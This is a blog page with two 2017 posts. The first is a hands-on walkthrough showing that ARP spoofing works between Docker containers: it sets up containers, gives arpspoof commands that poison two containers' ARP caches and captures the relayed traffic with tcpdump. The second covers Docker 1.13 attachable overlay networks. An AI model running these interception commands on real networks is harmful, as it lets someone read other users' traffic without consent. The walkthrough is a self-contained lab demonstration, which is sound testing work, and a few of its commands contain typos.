Thursday, January 26, 2017

ARP spoofing Docker containers


ARP spoofing is a relatively old hacking technique to intercept traffic on switched/bridged networks. It is essentially a mechanism to poison the ARP cache used by systems to find the MAC address of a certain host. Google searches will yield lots of information about the topic if you need further reading.

This write up is simply to validate whether the technique is still valid in containerized environments.

So let’s create a test environment to proof the point.

docker-machine create \
--driver digitalocean \
--digitalocean-access-token=d68aa…65b14e \
spooftest

Open a few terminals to make the testing easy

docker-machine ssh spooftest

On terminal 1, create the required containers
# docker build -t arpspoof - <<EOF
FROM debian
RUN apt-get update && apt-get install -y dsniff
EOF

# docker build -t tcpdump - <<EOF
FROM ubuntu
RUN apt-get update && apt-get install -y tcpdump
CMD tcpdump -i -n eth0
EOF

On terminal 2, create a busybox container named box1
# docker run -it --name box1 busybox
/ # ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:04
          inet addr:172.17.0.4  Bcast:0.0.0.0  Mask:255.255.0.0
          inet6 addr: fe80::42:acff:fe11:4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:550 (550.0 B)  TX bytes:508 (508.0 B)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

/ #

On terminal 3, create a busybox container named box2
# docker run -it --name box2 busybox
/ # ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:05
          inet addr:172.17.0.5  Bcast:0.0.0.0  Mask:255.255.0.0
          inet6 addr: fe80::42:acff:fe11:5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:550 (550.0 B)  TX bytes:418 (418.0 B)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

/ # ping 172.17.0.4

On terminal 1, launch the arpspoof attack
# docker run -it --name arpspoofer arpspoof
arpspoof -i eth0  -t 172.17.0.5 172.17.0.4 &
arpspoof -i eth0  -t 172.17.0.4 172.17.0.5 &

On terminal 4, launch a tcpdump to verify the arpsoof taking place
docker run -it --name tcpdumper --net=container:arpsoofer  tcpdump

Traffic should be relayed through the arpspoof container!
Posted by at 1 comment:
Labels: ,

Monday, January 16, 2017

Networking update on DOCKER 1.13.0-rc6 (beta)

As pointed out in me previous blog post, it was not possible to connect containers to a SWARM OVERLAY network used by the service. 

Docker v1.13 introduces the --attachable flag for network creation.

You can now create networks as follows:
docker network create --attachable --driver overlay net-1

Creating a service did not change, so:
docker service create  --name nginx --network net-1 --replicas 3  -p 80:80  nginx

Instead of running your test containers as a service or using other fancy tricks, we now can simply test by:
docker run -it --rm --network net-1 xxradar/hackon ping nginx

Happy testing !



Posted by at No comments:
Labels: , ,
Subscribe to: Posts (Atom)